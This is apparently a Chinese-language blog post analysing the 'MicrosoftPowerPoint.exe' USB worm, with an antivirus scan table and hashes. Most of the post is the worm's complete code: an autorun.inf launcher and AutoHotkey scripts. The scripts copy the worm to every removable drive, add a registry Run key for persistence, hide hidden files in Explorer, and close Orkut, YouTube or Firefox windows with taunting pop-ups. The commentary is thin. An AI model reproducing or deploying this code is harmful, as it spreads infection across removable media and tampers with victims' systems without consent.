MicrosoftPowerPoint.exe 病毒

最近老是在朋友的电脑和U盘发现一种MicrosoftPowerPoint.exe 病毒~这个病毒可以说是一种木马吧~利用autorun.inf启动。。。

以下是用多种防毒软件扫描的结果~

文件 MicrosoftPowerPoint.exe 接收于 2007.10.07 06:41:45 (CET)
反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2007.10.6.0	2007.10.05	Win32/Muha.worm.462050
AntiVir	7.6.0.20	2007.10.05	DR/Agent.aoe.1
Authentium	4.93.8	2007.10.05	is a security risk or a \"backdoor\" program
Avast	4.7.1051.0	2007.10.06	Win32:Agent-HYM
AVG	7.5.0.488	2007.10.06	Worm/Small.2.F
BitDefender	7.2	2007.10.07	Trojan.Agent.AACH
CAT-QuickHeal	9.00	2007.10.06	Worm.Muha.a
ClamAV	0.91.2	2007.10.07	Trojan.Mozban
DrWeb	4.44.0.09170	2007.10.06	Win32.HLLW.Offring
eSafe	7.0.15.0	2007.10.04	Win32.Trojan
eTrust-Vet	31.2.5190	2007.10.06	Win32/AHKHeap.A
Ewido	4.0	2007.10.06	-
FileAdvisor	1	2007.10.07	High threat detected
Fortinet	3.11.0.0	2007.10.07	Misc/AutoHotKey
F-Prot	4.3.2.48	2007.10.06	W32/Worm!adbb
F-Secure	6.70.13030.0	2007.10.06	Worm.Win32.Muha.a
Ikarus	T3.1.1.12	2007.10.07	Worm.Win32.Muha.a
Kaspersky	7.0.0.125	2007.10.07	Worm.Win32.Muha.a
McAfee	5135	2007.10.05	W32/AHKHeap
Microsoft	1.2908	2007.10.07	-
NOD32v2	2576	2007.10.07	Win32/AHKHeap.A
Norman	5.80.02	2007.10.05	Smalltroj.BHFI
Panda	9.0.0.4	2007.10.06	W32/AHKHeap.A.worm
Prevx1	V2	2007.10.07	-
Rising	19.43.50.00	2007.10.06	Trojan.Win32.Agent.aoe
Sophos	4.22.0	2007.10.06	W32/AHKHeap-A
Sunbelt	2.2.907.0	2007.10.06	-
Symantec	10	2007.10.07	Trojan.Dropper
TheHacker	6.2.6.078	2007.10.06	W32/Muha.a
VBA32	3.12.2.4	2007.10.05	Worm.Win32.Muha.a
VirusBuster	4.3.26:9	2007.10.06	Worm.DR.Muha.C
Webwasher-Gateway	6.0.1	2007.10.05	Trojan.Agent.aoe.1
附加信息
File size: 462050 bytes
MD5: 4f30003916cc70fca3ce6ec3f0ff1429
SHA1: 7a12afdc041a03da58971a0f7637252ace834353
Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=4f30003916cc70fca3ce6ec3f0ff1429

其实多种防毒软件都能检测到，所以也不算有什么威胁性~

经我测试--病毒包含两个文件件~以下是编码

autorun.inf

[Autorun]
open=MicrosoftPowerPoint.exe
shellexecute=MicrosoftPowerPoint.exe
shell\Auto\command=MicrosoftPowerPoint.exe

MicrosoftPowerPoint.exe

drivelist

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z


reproduce

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

script1

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r牋牋牋牋OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}

}
return


std

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

值得一提的是病毒作者对firefox似乎有点过节---一打开firefox就会提示窗~
I Dont hate Mozilla but use IE or Else

有点针对firefox似的~。。。呵呵~